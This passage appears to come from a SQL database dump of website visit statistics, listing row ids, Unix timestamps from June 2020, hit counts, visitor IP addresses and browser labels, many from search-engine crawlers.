593329706,3,3,0,0,'66.249.70.72','chrome'),(517839,1593329813,3,3,0,0,'66.249.70.70','chrome'),(517840,1593330020,1,1,0,0,'66.249.64.36','chrome'),(517841,1593330022,8,8,0,0,'185.11.82.228','other'),(517842,1593330300,1,1,0,0,'66.249.64.38','chrome'),(517843,1593330675,1,1,0,0,'131.220.6.152','chrome'),(517844,1593331193,3,3,0,0,'66.249.70.70','chrome'),(517845,1593331340,1,1,0,0,'91.196.178.172','chrome'),(517846,1593331466,8,8,0,0,'185.11.82.228','other'),(517847,1593331667,2,2,0,0,'66.249.70.69','chrome'),(517848,1593331674,1,1,0,0,'17.58.99.7','other'),(517849,1593331958,1,1,0,0,'66.249.70.72','chrome'),(517850,1593331964,1,1,0,0,'8.29.198.27','other'),(517851,1593332057,1,1,0,0,'8.29.198.25','other'),(517852,1593332080,1,1,0,0,'2.47.39.213','other'),(517853,1593332185,1,1,0,0,'66.249.70.70','chrome'),(517854,1593332909,8,8,0,0,'185.11.82.228','other'),(517855,1593333017,1,1,0,0,'185.15.56.22','other'),(517856,1593333153,1,1,0,0,'66.249.64.36','chrome'),(517857,1593333460,1,1,0,0,'66.249.70.69','chrome'),(517858,1593334037,2,2,0,0,'66.249.70.72','chrome'),(517859,1593334360,8,8,0,0,'185.11.82.228','other'),(517860,1593334453,2,2,0,0,'66.249.70.69','chrome'),(517861,1593334533,2,2,0,0,'66.249.70.70','chrome'),(517862,1593334604,1,1,0,0,'66.249.64.33','chrome'),(517863,1593335306,1,1,0,0,'66.249.70.72','chrome'),(517864,1593335567,2,2,0,0,'91.196.178.183','chrome'),(517865,1593335813,1,1,0,0,'66.249.64.38','chrome'),(517866,1593335845,8,8,0,0,'185.11.82.228','other'),(517867,1593337060,2,2,0,0,'66.249.70.72','chrome'),(517868,1593337065,1,1,0,0,'66.249.70.70','chrome'),(517869,1593337362,8,8,0,0,'185.11.82.228','other'),(517870,1593338475,1,1,0,0,'66.249.64.38','chrome'),(517871,1593338482,2,2,0,0,'66.249.64.33','chrome'),(517872,1593338879,8,8,0,0,'185.11.82.228','other'),(517873,1593339505,1,1,0,0,'45.151.105.2','other'),(517874,1593339885,1,1,0,0,'37.143.62.56','chrome'),(517875,1593340378,8,8,0,0,'185.11.82.228','other'),(517876,1593340433,1,1,0,0,'66.249.70.72','chrome'),(517877,1593341529,1,1,0,0,'109.74.154.72','chrome'),(517878,1593341706,1,1,0,0,'66.249.70.70','chrome'),(517879,1593341877,8,8,0,0,'185.11.82.228','other'),(517880,1593342362,1,1,0,0,'66.249.70.72','chrome'),(517881,1593342527,1,1,0,0,'66.249.70.69','chrome'),(517882,1593342538,2,2,0,0,'66.249.64.36','chrome'),(517883,1593342789,2,2,0,0,'8.29.198.25','other'),(517884,1593343032,1,1,0,0,'213.180.203.95','other'),(517885,1593343174,1,1,0,0,'178.154.200.222','other'),(517886,1593343361,8,8,0,0,'185.11.82.228','other'),(517887,1593343626,3,3,0,0,'66.249.70.70','chrome'),(517888,1593343729,2,2,0,0,'66.249.70.69','chrome'),(517889,1593343753,1,1,0,0,'66.249.64.36','chrome'),(517890,1593344043,2,2,0,0,'66.249.70.72','chrome'),(517891,1593344097,1,1,0,0,'5.58.184.38','chrome'),(517892,1593344776,1,1,0,0,'207.46.13.116','other'),(517893,1593344794,3,3,0,0,'66.249.70.70','chrome'),(517894,1593344867,8,8,0,0,'185.11.82.228','other'),(517895,1593345516,1,1,0,0,'66.249.70.69','chrome'),(517896,1593345572,1,1,0,0,'66.249.64.36','chrome'),(517897,1593346217,1,1,0,0,'66.249.70.72','chrome'),(517898,1593346407,8,8,0,0,'185.11.82.228','other'),(517899,1593346678,1,1,0,0,'66.249.64.36','chrome'),(517900,1593347246,1,1,0,0,'66.249.64.33','chrome'),(517901,1593347772,1,1,0,0,'66.249.70.70','chrome'),(517902,1593347916,8,8,0,0,'185.11.82.228','other'),(517903,1593348070,1,1,0,0,'54.36.149.79','other'),(517904,1593349058,1,1,0,0,'5.58.184.38','chrome'),(517905,1593349430,8,8,0,0,'185.11.82.228','other'),(517906,1593350229,1,1,0,0,'5.58.184.38','chrome'),(517907,1593350350,1,1,0,0,'66.249.64.33','chrome'),(517908,1593350803,1,1,0,0,'178.154.200.92','other'),(517909,1593350931,8,8,0,0,'185.11.82.228','other'),(517910,1593351133,1,1,0,0,'178.154.200.222','other'),(517911,1593351378,1,1,0,0,'66.249.64.38','chrome'),(517912,1593351931,1,1,0,0,'213.180.203.16','other'),(517913,1593352459,8,8,0,0,'185.11.82.228','other'),(517914,1593352538,1,1,0,0,'194.61.24.94','other'),(517915,1593352893,1,1,0,0,'91.196.178.179','chrome'),(517916,1593353407,2,2,0,0,'66.249.70.72','chrome'),(517917,1593353608,1,1,0,0,'8.29.198.27','other'),(517918,1593353714,1,1,0,0,'8.29.198.25','other'),(517919,1593353976,1,1,0,0,'91.196.178.179','chrome'),(517920,1593354145,1,1,0,0,'66.249.64.36','chrome'),(517921,1593354289,8,8,0,0,'185.11.82.228','other'),(517922,1593354370,1,1,0,0,'66.249.70.72','chrome'),(517923,1593354429,2,2,0,0,'66.249.64.38','chrome'),(517924,1593354723,1,1,0,0,'66.249.70.69','chrome'),(517925,1593355755,2,2,0,0,'66.249.70.70','chrome'),(517926,1593355828,1,1,0,0,'66.249.70.69','chrome'),(517927,1593356246,8,8,0,0,'185.11.82.228','other'),(517928,1593356365,2,2,0,0,'66.249.70.72','chrome'),(517929,1593356640,2,2,0,0,'66.249.64.33','chrome'),(517930,1593356805,1,1,0,0,'66.249.70.69','chrome'),(517931,1593358130,1,1,0,0,'66.249.70.69','chrome'),(517932,1593358291,1,0,1,0,'66.249.64.38',''),(517933,1593358314,8,8,0,0,'185.11.82.228','other'),(517934,1593358405,2,2,0,0,'66.249.70.72','chrome'),(517935,1593359235,1,1,0,0,'66.249.70.70','chrome'),(517936,1593359534,2,2,0,0,'157.55.39.182','other'),(517937,1593359989,1,1,0,0,'37.143.63.162','chrome'),(517938,1593360012,1,1,0,0,'17.58.99.7','other'),(517939,1593360217,1,1,0,0,'66.249.64.36','chrome'),(517940,1593360242,1,1,0,0,'178.154.200.222','other'),(517941,1593360303,8,8,0,0,'185.11.82.228','other'),(517942,1593360508,1,1,0,0,'89.19.48.184','chrome'),(517943,1593360515,1,1,0,0,'66.249.70.69','chrome'),(517944,1593361144,1,1,0,0,'213.180.203.23','other'),(517945,1593362186,1,1,0,0,'66.249.70.72','chrome'),(517946,1593362393,8,8,0,0,'185.11.82.228','other'),(517947,1593363578,1,1,0,0,'66.249.70.70','chrome'),(517948,1593363882,1,1,0,0,'66.249.64.38','chrome'),(517949,1593363941,1,1,0,0,'66.249.64.36','chrome'),(517950,1593364128,1,1,0,0,'91.196.121.135','chrome'),(517951,1593364426,1,1,0,0,'8.29.198.26','other'),(517952,1593364436,8,8,0,0,'185.11.82.228','other'),(517953,1593364473,1,1,0,0,'3.23.98.146','other'),(517954,1593364543,1,1,0,0,'8.29.198.27','other'),(517955,1593364955,1,1,0,0,'66.249.64.33','chrome'),(517956,1593365422,4,4,0,0,'66.249.70.72','chrome'),(517957,1593365481,1,1,0,0,'66.249.70.70','chrome'),(517958,1593365894,2,2,0,0,'66.249.70.69','chrome'),(517959,1593366293,1,1,0,0,'176.107.184.171','firefox'),(517960,1593366295,1,1,0,0,'176.107.184.171','chrome'),(517961,1593366394,2,2,0,0,'66.249.64.33','chrome'),(517962,1593366490,8,8,0,0,'185.11.82.228','other'),(517963,1593366819,3,3,0,0,'66.249.70.69','chrome'),(517964,1593366830,2,2,0,0,'66.249.64.36','chrome'),(517965,1593367073,2,2,0,0,'66.249.70.72','chrome'),(517966,1593368021,2,2,0,0,'66.249.70.70','chrome'),(517967,1593368034,3,3,0,0,'66.249.70.69','chrome'),(517968,1593368548,8,8,0,0,'185.11.82.228','other'),(517969,1593368696,1,1,0,0,'66.249.70.72','chrome'),(517970,1593369272,1,1,0,0,'66.249.64.33','chrome'),(517971,1593369294,1,1,0,0,'66.249.70.70','chrome'),(517972,1593369916,1,1,0,0,'66.249.70.72','chrome'),(517973,1593370219,1,1,0,0,'66.249.70.70','chrome'),(517974,1593370407,1,1,0,0,'66.249.64.38','chrome'),(517975,1593370445,1,1,0,0,'66.249.64.36','chrome'),(517976,1593370618,8,8,0,0,'185.11.82.228','other'),(517977,1593370653,2,2,0,0,'66.249.70.69','chrome'),(517978,1593371770,1,1,0,0,'66.249.70.72','chrome'),(517979,1593371778,2,2,0,0,'66.249.70.69','chrome'),(517980,1593372676,8,8,0,0,'185.11.82.228','other'),(517981,1593373189,2,2,0,0,'66.249.70.69','chrome'),(517982,1593373267,3,3,0,0,'66.249.70.72','chrome'),(517983,1593373294,2,2,0,0,'66.249.70.70','chrome'),(517984,1593373368,1,1,0,0,'66.249.64.38','chrome'),(517985,1593374776,8,8,0,0,'185.11.82.228','other'),(517986,1593375209,2,2,0,0,'66.249.70.70','chrome'),(517987,1593375250,2,2,0,0,'8.29.198.26','other'),(517988,1593375265,1,1,0,0,'66.249.64.33','chrome'),(517989,1593375764,1,1,0,0,'66.249.64.38','chrome'),(517990,1593376895,8,8,0,0,'185.11.82.228','other'),(517991,1593376912,1,1,0,0,'66.249.64.38','chrome'),(517992,1593376993,1,1,0,0,'66.249.64.33','chrome'),(517993,1593377394,3,3,0,0,'66.249.70.70','chrome'),(517994,1593377591,2,2,0,0,'66.249.70.69','chrome'),(517995,1593378005,1,1,0,0,'66.249.64.36','chrome'),(517996,1593378214,2,2,0,0,'66.249.64.33','chrome'),(517997,1593378828,1,1,0,0,'178.154.200.92','other'),(517998,1593379051,8,8,0,0,'185.11.82.228','other'),(517999,1593379424,2,2,0,0,'66.249.70.70','chrome'),(518000,1593379603,1,1,0,0,'66.249.64.33','chrome'),(518001,1593379640,5,5,0,0,'66.249.70.69','chrome'),(518002,1593379788,2,2,0,0,'66.249.70.72','chrome'),(518003,1593381165,8,8,0,0,'185.11.82.228','other'),(518004,1593381332,1,1,0,0,'66.249.70.72','chrome'),(518005,1593381922,2,2,0,0,'66.249.70.69','chrome'),(518006,1593382273,3,3,0,0,'66.249.70.70','chrome'),(518007,1593382300,1,1,0,0,'66.249.64.33','chrome'),(518008,1593382574,1,1,0,0,'178.154.200.222','other'),(518009,1593382967,3,3,0,0,'66.249.70.72','chrome'),(518010,1593383050,1,1,0,0,'213.180.203.16','other'),(518011,1593383284,8,8,0,0,'185.11.82.228','other'),(518012,1593383547,1,1,0,0,'66.249.64.38','chrome'),(518013,1593384546,2,2,0,0,'66.249.70.72','chrome'),(518014,1593384620,2,2,0,0,'66.249.70.69','chrome'),(518015,1593384664,1,1,0,0,'66.249.64.36','chrome'),(518016,1593384750,1,1,0,0,'66.249.70.70','chrome'),(518017,1593385515,8,8,0,0,'185.11.82.228','other'),(518018,1593385569,1,1,0,0,'207.46.13.166','other'),(518019,1593385667,1,1,0,0,'66.249.70.70','chrome'),(518020,1593385723,2,2,0,0,'66.249.70.72','chrome'),(518021,1593385784,2,2,0,0,'66.249.64.38','chrome'),(518022,1593386076,1,1,0,0,'8.29.198.26','other'),(518023,1593386198,1,1,0,0,'8.29.198.25','other'),(518024,1593386626,1,1,0,0,'66.249.70.72','chrome'),(518025,1593387120,5,5,0,0,'66.249.70.70','chrome'),(518026,1593387182,3,3,0,0,'66.249.70.69','chrome'),(518027,1593387527,1,1,0,0,'66.249.64.36','chrome'),(518028,1593387689,8,8,0,0,'185.11.82.228','other'),(518029,1593388506,1,1,0,0,'62.205.134.182','other'),(518030,1593389165,6,6,0,0,'66.249.70.69','chrome'),(518031,1593389294,3,3,0,0,'66.249.70.70','chrome'),(518032,1593389373,1,1,0,0,'66.249.64.38','chrome'),(518033,1593389391,3,3,0,0,'66.249.64.36','chrome'),(518034,1593389888,8,8,0,0,'185.11.82.228','other'),(518035,1593390938,1,1,0,0,'66.249.70.70','chrome'),(518036,1593391063,3,3,0,0,'66.249.70.69','chrome'),(518037,1593392108,8,8,0,0,'185.11.82.228','other'),(518038,1593392347,1,1,0,0,'66.249.64.36','chrome'),(518039,1593392631,1,1,0,0,'66.249.70.70','chrome'),(518040,1593392693,2,2,0,0,'66.249.70.72','chrome'),(518041,1593392799,1,1,0,0,'66.249.64.38','chrome'),(518042,1593393055,1,1,0,0,'207.46.13.166','other'),(518043,1593394234,8,8,0,0,'185.11.82.228','other'),(518044,1593394668,1,1,0,0,'66.249.64.33','chrome'),(518045,1593394959,1,1,0,0,'66.249.70.69','chrome'),(518046,1593395014,2,2,0,0,'66.249.70.70','chrome'),(518047,1593395145,1,1,0,0,'103.207.117.18','chrome'),(518048,1593395204,1,1,0,0,'178.154.200.196','other'),(518049,1593396148,1,1,0,0,'66.249.70.69','chrome'),(518050,1593396439,8,8,0,0,'185.11.82.228','other'),(518051,1593396595,2,2,0,0,'66.249.70.70','chrome'),(518052,1593396809,3,2,1,0,'66.249.70.72',''),(518053,1593396901,2,2,0,0,'8.29.198.26','other'),(518054,1593397182,1,1,0,0,'213.180.203.146','other'),(518055,1593397625,1,1,0,0,'66.249.70.72','chrome'),(518056,1593398379,1,1,0,0,'59.153.145.241','chrome'),(518057,1593398751,8,8,0,0,'185.11.82.228','other'),(518058,1593399581,1,1,0,0,'17.58.99.7','other'),(518059,1593399999,2,2,0,0,'66.249.70.69','chrome'),(518060,1593400384,1,1,0,0,'66.249.70.70','chrome'),(518061,1593400519,1,1,0,0,'66.249.64.38','chrome'),(518062,1593401014,8,8,0,0,'185.11.82.228','other'),(518063,1593401781,2,2,0,0,'66.249.70.69','chrome'),(518064,1593402117,2,2,0,0,'66.249.70.72','chrome'),(518065,1593402157,1,1,0,0,'66.249.70.70','chrome'),(518066,1593402213,1,1,0,0,'66.249.64.33','chrome'),(518067,1593403188,1,1,0,0,'66.249.70.70','chrome'),(518068,1593403388,8,8,0,0,'185.11.82.228','other'),(518069,1593403676,1,1,0,0,'66.249.64.36','chrome'),(518070,1593403858,1,1,0,0,'66.249.70.72','chrome'),(518071,1593403946,1,1,0,0,'66.249.70.69','chrome'),(518072,1593404165,1,1,0,0,'46.133.37.109','chrome'),(518073,1593404389,1,1,0,0,'193.106.30.99','chrome'),(518074,1593405076,1,1,0,0,'66.249.70.70','chrome'),(518075,1593405374,1,1,0,0,'59.153.145.173','chrome'),(518076,1593405851,1,1,0,0,'178.154.200.97','other'),(518077,1593406113,1,1,0,0,'62.205.134.182','other'),(518078,1593406458,8,8,0,0,'185.11.82.228','other'),(518079,1593406934,1,1,0,0,'66.249.70.70','chrome'),(518080,1593406952,1,1,0,0,'207.46.13.166','other'),(518081,1593407085,1,1,0,0,'66.249.70.72','chrome'),(518082,1593407721,2,2,0,0,'8.29.198.26','other'),(518083,1593407806,2,2,0,0,'66.249.70.69','chrome'),(518084,1593407854,1,1,0,0,'66.249.64.33','chrome'),(518085,1593408203,1,1,0,0,'66.249.64.36','chrome'),(518086,1593408973,4,4,0,0,'66.249.70.70','chrome'),(518087,1593409101,1,1,0,0,'66.249.64.38','chrome'),(518088,1593409637,8,8,0,0,'185.11.82.228','other'),(518089,1593409976,1,1,0,0,'66.249.70.72','chrome'),(518090,1593412889,8,8,0,0,'185.11.82.228','other'),(518091,1593413651,1,1,0,0,'37.143.63.31','chrome'),(518092,1593413685,1,1,0,0,'66.249.64.33','chrome'),(518093,1593413694,1,1,0,0,'207.46.13.166','other'),(518094,1593413710,2,2,0,0,'66.249.70.70','chrome'),(518095,1593414462,1,1,0,0,'17.58.99.7','other'),(518096,1593415072,1,1,0,0,'213.180.203.16','other'),(518097,1593416172,1,1,0,0,'66.249.70.69','chrome'),(518098,1593416234,1,1,0,0,'195.248.240.19','chrome'),(518099,1593416321,8,8,0,0,'185.11.82.228','other'),(518100,1593416377,1,1,0,0,'131.220.6.152','chrome'),(518101,1593416388,1,1,0,0,'66.249.70.70','chrome'),(518102,1593416753,1,1,0,0,'31.177.95.183','chrome'),(518103,1593417599,1,1,0,0,'207.46.13.159','other'),(518104,1593418184,1,1,0,0,'173.236.243.26','chrome'),(518105,1593418487,1,0,1,0,'66.249.70.70',''),(518106,1593418507,1,1,0,0,'51.68.11.223','chrome'),(518107,1593418531,2,2,0,0,'212.158.174.121','chrome'),(518108,1593418538,1,1,0,0,'8.29.198.25','other'),(518109,1593418695,1,1,0,0,'8.29.198.26','other'),(518110,1593418853,2,2,0,0,'17.58.99.7','other'),(518111,1593419126,2,2,0,0,'207.46.13.166','other'),(518112,1593419703,8,8,0,0,'185.11.82.228','other'),(518113,1593419930,1,1,0,0,'178.154.200.222','other'),(518114,1593420088,1,1,0,0,'5.181.131.118','chrome'),(518115,1593420104,1,1,0,0,'5.144.130.20','chrome'),(518116,1593420151,1,1,0,0,'109.70.3.170','chrome'),(518117,1593420640,1,1,0,0,'66.249.64.38','chrome'),(518118,1593420903,1,1,0,0,'66.249.64.33','chrome'),(518119,1593422325,1,1,0,0,'66.249.70.69','chrome'),(518120,1593423365,1,1,0,0,'178.154.200.222','other'),(518121,1593423486,1,1,0,0,'27.124.5.49','chrome'),(518122,1593423521,8,8,0,0,'185.11.82.228','other'),(518123,1593423529,1,1,0,0,'66.249.70.69','chrome'),(518124,1593423547,2,2,0,0,'103.86.51.104','chrome'),(518125,1593423578,1,1,0,0,'66.249.70.72','chrome'),(518126,1593424125,1,1,0,0,'178.154.200.220','other'),(518127,1593424499,1,1,0,0,'66.249.64.38','chrome'),(518128,1593424595,1,1,0,0,'18.210.23.96','chrome'),(518129,1593424646,2,2,0,0,'66.249.70.69','chrome'),(518130,1593424720,2,2,0,0,'66.249.70.72','chrome'),(518131,1593425991,1,1,0,0,'207.46.13.159','other'),(518132,1593426849,1,1,0,0,'203.217.140.107','chrome'),(518133,1593427125,1,1,0,0,'51.68.11.215','chrome'),(518134,1593427414,8,8,0,0,'185.11.82.228','other'),(518135,1593428107,1,1,0,0,'51.77.52.160','chrome'),(518136,1593428490,1,1,0,0,'41.203.16.122','chrome'),(518137,1593428947,1,1,0,0,'66.249.70.69','chrome'),(518138,1593429014,1,1,0,0,'109.74.154.72','chrome'),(518139,1593429363,1,1,0,0,'8.29.198.25','other'),(518140,1593429521,1,1,0,0,'8.29.198.26','other'),(518141,1593429897,4,4,0,0,'66.249.70.72','chrome'),(518142,1593430311,2,2,0,0,'167.172.174.199','chrome'),(518143,1593430322,1,1,0,0,'157.55.39.64','other'),(518144,1593430336,3,3,0,0,'66.249.70.69','chrome'),(518145,1593430366,1,1,0,0,'157.55.39.221','other'),(518146,1593431241,1,1,0,0,'194.61.24.94','other'),(518147,1593431656,8,8,0,0,'185.11.82.228','other'),(518148,1593431756,1,1,0,0,'66.249.70.72','chrome'),(518149,1593432225,1,1,0,0,'178.154.200.151','other'),(518150,1593432337,1,1,0,0,'157.55.39.64','other'),(518151,1593432645,1,1,0,0,'66.249.70.69','chrome'),(518152,1593432756,1,1,0,0,'51.158.169.206','other'),(518153,1593432768,2,2,0,0,'66.249.70.70','chrome'),(518154,1593433830,2,2,0,0,'66.249.70.72','chrome'),(518155,1593434282,1,1,0,0,'207.46.13.159','other'),(518156,1593434417,1,1,0,0,'66.249.64.33','chrome'),(518157,1593434831,1,1,0,0,'66.249.64.36','chrome'),(518158,1593435006,1,1,0,0,'213.180.203.122','other'),(518159,1593435162,1,1,0,0,'109.70.106.130','other'),(518160,1593435502,2,2,0,0,'66.249.70.72','chrome'),(518161,1593435916,1,1,0,0,'207.46.13.159','other'),(518162,1593435956,8,8,0,0,'185.11.82.228','other'),(518163,1593436842,2,2,0,0,'207.46.13.166','other'),(518164,1593437093,2,2,0,0,'154.81.86.238','chrome'),(518165,1593437246,1,1,0,0,'69.163.152.143','chrome'),(518166,1593437736,2,2,0,0,'18.237.145.200','chrome'),(518167,1593437983,1,1,0,0,'66.249.70.72','chrome'),(518168,1593440192,1,1,0,0,'8.29.198.25','other'),(518169,1593440270,8,8,0,0,'185.11.82.228','other'),(518170,1593440351,1,1,0,0,'8.29.198.26','other'),(518171,1593440402,4,4,0,0,'91.208.99.2','chrome'),(518172,1593440524,2,2,0,0,'51.68.11.195','chrome'),(518173,1593440848,1,1,0,0,'207.46.13.159','other'),(518174,1593441059,1,1,0,0,'66.249.64.33','chrome'),(518175,1593441137,1,1,0,0,'66.249.70.69','chrome'),(518176,1593441717,1,1,0,0,'66.249.70.72','chrome'),(518177,1593442176,2,2,0,0,'80.51.181.13','chrome'),(518178,1593442215,2,2,0,0,'207.46.13.159','other'),(518179,1593443350,1,1,0,0,'207.46.13.159','other'),(518180,1593443737,2,2,0,0,'185.182.56.85','chrome'),(518181,1593443803,1,1,0,0,'78.181.227.150','other'),(518182,1593443892,1,1,0,0,'157.55.39.64','other'),(518183,1593444365,1,1,0,0,'66.249.64.24','chrome'),(518184,1593444576,8,8,0,0,'185.11.82.228','other'),(518185,1593444618,1,1,0,0,'66.249.64.25','chrome'),(518186,1593444642,1,1,0,0,'66.249.64.23','chrome'),(518187,1593444704,1,1,0,0,'66.249.70.68','chrome'),(518188,1593445205,1,1,0,0,'37.143.63.40','chrome'),(518189,1593445494,2,2,0,0,'46.37.171.183','chrome'),(518190,1593445622,2,2,0,0,'207.46.13.166','other'),(518191,1593446070,1,1,0,0,'66.249.64.23','chrome'),(518192,1593446301,1,1,0,0,'157.55.39.221','other'),(518193,1593446628,2,2,0,0,'66.249.64.24','chrome'),(518194,1593446636,1,0,1,0,'66.249.70.65',''),(518195,1593447788,1,1,0,0,'207.46.13.159','other'),(518196,1593447895,1,1,0,0,'66.249.70.68','chrome'),(518197,1593447944,1,1,0,0,'66.249.70.70','chrome'),(518198,1593448423,1,1,0,0,'24.69.165.227','chrome'),(518199,1593448766,8,8,0,0,'185.11.82.228','other'),(518200,1593449228,1,1,0,0,'66.249.64.24','chrome'),(518201,1593449680,1,1,0,0,'66.249.70.68','chrome'),(518202,1593449686,3,3,0,0,'66.249.64.25','chrome'),(518203,1593449752,1,1,0,0,'66.249.70.65','chrome'),(518204,1593449826,4,4,0,0,'66.249.64.23','chrome'),(518205,1593450326,1,1,0,0,'66.249.64.24','chrome'),(518206,1593450509,2,2,0,0,'157.55.39.64','other'),(518207,1593451015,1,1,0,0,'8.29.198.26','other'),(518208,1593451180,1,1,0,0,'8.29.198.25','other'),(518209,1593451510,1,1,0,0,'157.55.39.221','other'),(518210,1593451678,2,2,0,0,'66.249.70.69','chrome'),(518211,1593451926,2,2,0,0,'66.249.70.72','chrome'),(518212,1593453073,1,0,1,0,'66.249.70.69',''),(518213,1593453163,8,8,0,0,'185.11.82.228','other'),(518214,1593453610,4,4,0,0,'66.249.70.70','chrome'),(518215,1593453653,3,3,0,0,'66.249.70.69','chrome'),(518216,1593454103,1,1,0,0,'66.249.64.33','chrome'),(518217,1593454226,1,1,0,0,'157.55.39.221','other'),(518218,1593454228,2,2,0,0,'66.249.70.72','chrome'),(518219,1593454379,1,1,0,0,'51.68.11.207','chrome'),(518220,1593454661,1,1,0,0,'185.98.131.155','chrome'),(518221,1593455059,1,1,0,0,'91.202.144.89','chrome'),(518222,1593455800,3,3,0,0,'66.249.70.70','chrome'),(518223,1593455862,1,1,0,0,'66.249.70.72','chrome'),(518224,1593455955,1,1,0,0,'66.249.70.69','chrome'),(518225,1593457242,1,1,0,0,'66.249.70.72','chrome'),(518226,1593457666,1,1,0,0,'35.154.65.246','chrome'),(518227,1593457701,2,2,0,0,'66.249.70.69','chrome'),(518228,1593457748,8,8,0,0,'185.11.82.228','other'),(518229,1593458235,1,1,0,0,'66.249.64.38','chrome'),(518230,1593458384,1,1,0,0,'157.55.39.64','other'),(518231,1593458778,2,2,0,0,'66.249.70.70','chrome'),(518232,1593458794,1,1,0,0,'213.180.203.16','other'),(518233,1593459088,3,3,0,0,'66.249.70.69','chrome'),(518234,1593459155,1,1,0,0,'111.90.149.100','chrome'),(518235,1593459369,1,1,0,0,'66.249.64.36','chrome'),(518236,1593461114,1,1,0,0,'66.249.70.70','chrome'),(518237,1593461287,1,1,0,0,'66.249.70.69','chrome'),(518238,1593461840,1,1,0,0,'8.29.198.27','other'),(518239,1593462012,1,1,0,0,'8.29.198.26','other'),(518240,1593462441,1,1,0,0,'66.249.70.72','chrome'),(518241,1593462552,2,2,0,0,'66.249.70.69','chrome'),(518242,1593462578,8,8,0,0,'185.11.82.228','other'),(518243,1593462672,2,2,0,0,'109.70.3.170','chrome'),(518244,1593462833,3,3,0,0,'51.68.11.191','chrome'),(518245,1593463225,2,2,0,0,'95.213.141.126','opera'),(518246,1593463615,1,1,0,0,'157.55.39.221','other'),(518247,1593463792,2,2,0,0,'66.249.70.69','chrome'),(518248,1593464369,1,1,0,0,'31.177.95.66','chrome'),(518249,1593464613,1,1,0,0,'66.249.70.70','chrome'),(518250,1593465333,1,1,0,0,'157.55.39.221','other'),(518251,1593465484,1,1,0,0,'66.249.70.69','chrome'),(518252,1593465909,1,1,0,0,'207.46.13.166','other'),(518253,1593465929,1,1,0,0,'157.55.39.64','other'),(518254,1593466020,3,3,0,0,'66.249.70.70','chrome'),(518255,1593466142,1,1,0,0,'207.46.13.159','other'),(518256,1593466901,1,1,0,0,'207.46.13.166','other'),(518257,1593467062,8,8,0,0,'185.11.82.228','other'),(518258,1593468118,1,1,0,0,'66.249.70.72','chrome'),(518259,1593468587,1,1,0,0,'66.249.70.70','chrome'),(518260,1593468966,1,1,0,0,'157.55.39.221','other'),(518261,1593469026,1,1,0,0,'66.249.70.72','chrome'),(518262,1593470013,1,1,0,0,'66.249.70.72','chrome'),(518263,1593470579,1,1,0,0,'59.153.145.116','chrome'),(518264,1593471007,1,1,0,0,'207.46.13.210','other'),(518265,1593471039,4,4,0,0,'66.249.70.72','chrome'),(518266,1593471051,5,5,0,0,'66.249.70.69','chrome'),(518267,1593471235,9,9,0,0,'66.249.70.70','chrome'),(518268,1593471315,8,8,0,0,'185.11.82.228','other'),(518269,1593472050,4,4,0,0,'66.249.70.69','chrome'),(518270,1593472325,1,1,0,0,'66.249.64.38','chrome'),(518271,1593472664,1,1,0,0,'8.29.198.25','other'),(518272,1593472847,1,1,0,0,'8.29.198.27','other'),(518273,1593474087,1,1,0,0,'66.249.70.69','chrome'),(518274,1593474906,1,1,0,0,'62.205.134.182','other'),(518275,1593475170,1,1,0,0,'178.154.200.97','other'),(518276,1593475196,3,3,0,0,'66.249.70.72','chrome'),(518277,1593475527,2,2,0,0,'66.249.70.70','chrome'),(518278,1593476060,8,8,0,0,'185.11.82.228','other'),(518279,1593476155,1,1,0,0,'66.249.70.69','chrome'),(518280,1593476678,2,2,0,0,'66.249.70.70','chrome'),(518281,1593478801,1,1,0,0,'66.249.70.70','chrome'),(518282,1593479596,1,1,0,0,'66.249.70.69','chrome'),(518283,1593479660,1,1,0,0,'213.180.203.30','other'),(518284,1593480171,1,1,0,0,'66.249.64.33','chrome'),(518285,1593480665,1,1,0,0,'66.249.70.70','chrome'),(518286,1593480688,1,1,0,0,'178.154.200.222','other'),(518287,1593480930,1,1,0,0,'66.249.70.69','chrome'),(518288,1593481370,1,1,0,0,'34.221.55.238','chrome'),(518289,1593481460,1,1,0,0,'178.154.200.97','other'),(518290,1593482210,3,3,0,0,'66.249.70.70','chrome'),(518291,1593482356,1,1,0,0,'66.249.70.69','chrome'),(518292,1593482520,8,8,0,0,'185.11.82.228','other'),(518293,1593482810,2,2,0,0,'207.46.13.210','other'),(518294,1593483160,1,1,0,0,'207.46.13.166','other'),(518295,1593483500,1,1,0,0,'8.29.198.26','other'),(518296,1593483538,2,2,0,0,'195.128.120.143','chrome'),(518297,1593483680,1,1,0,0,'8.29.198.25','other'),(518298,1593483688,1,1,0,0,'213.180.203.145','other'),(518299,1593484288,1,1,0,0,'66.249.70.69','chrome'),(518300,1593484591,1,1,0,0,'213.180.203.189','other'),(518301,1593484961,2,2,0,0,'89.46.105.169','chrome'),(518302,1593484984,2,2,0,0,'66.249.70.72','chrome'),(518303,1593485121,5,5,0,0,'66.249.70.70','chrome'),(518304,1593485232,1,1,0,0,'157.55.39.64','other'),(518305,1593485559,1,1,0,0,'66.249.70.69','chrome'),(518306,1593485654,1,1,0,0,'207.46.13.210','other'),(518307,1593485716,1,1,0,0,'37.192.95.140','chrome'),(518308,1593486538,1,1,0,0,'66.249.70.72','chrome'),(518309,1593486689,1,1,0,0,'66.249.70.69','chrome'),(518310,1593486700,1,1,0,0,'213.180.203.95','other'),(518311,1593486748,5,5,0,0,'51.68.11.231','chrome'),(518312,1593486848,2,2,0,0,'66.249.70.70','chrome'),(518313,1593487182,1,1,0,0,'178.154.200.245','other'),(518314,1593487726,2,2,0,0,'66.249.70.69','chrome'),(518315,1593488470,1,1,0,0,'66.249.64.38','chrome'),(518316,1593488490,1,1,0,0,'178.208.83.21','chrome'),(518317,1593488557,1,1,0,0,'66.249.70.72','chrome'),(518318,1593488900,1,1,0,0,'66.249.70.69','chrome'),(518319,1593489063,1,1,0,0,'66.249.64.36','chrome'),(518320,1593489254,8,8,0,0,'185.11.82.228','other'),(518321,1593489270,1,1,0,0,'75.75.232.194','chrome'),(518322,1593489276,1,1,0,0,'138.128.14.147','chrome'),(518323,1593489286,1,1,0,0,'213.180.203.16','other'),(518324,1593489287,1,1,0,0,'178.154.200.222','other'),(518325,1593489329,3,3,0,0,'213.180.203.142','other'),(518326,1593489330,1,1,0,0,'178.154.200.87','other'),(518327,1593489361,1,1,0,0,'66.249.70.70','chrome'),(518328,1593489524,2,2,0,0,'66.249.70.72','chrome'),(518329,1593489936,1,1,0,0,'66.249.70.69','chrome'),(518330,1593490110,1,1,0,0,'178.208.83.57','chrome'),(518331,1593490599,1,1,0,0,'51.68.11.223','chrome'),(518332,1593491116,2,2,0,0,'66.249.64.36','chrome'),(518333,1593491246,1,1,0,0,'194.61.24.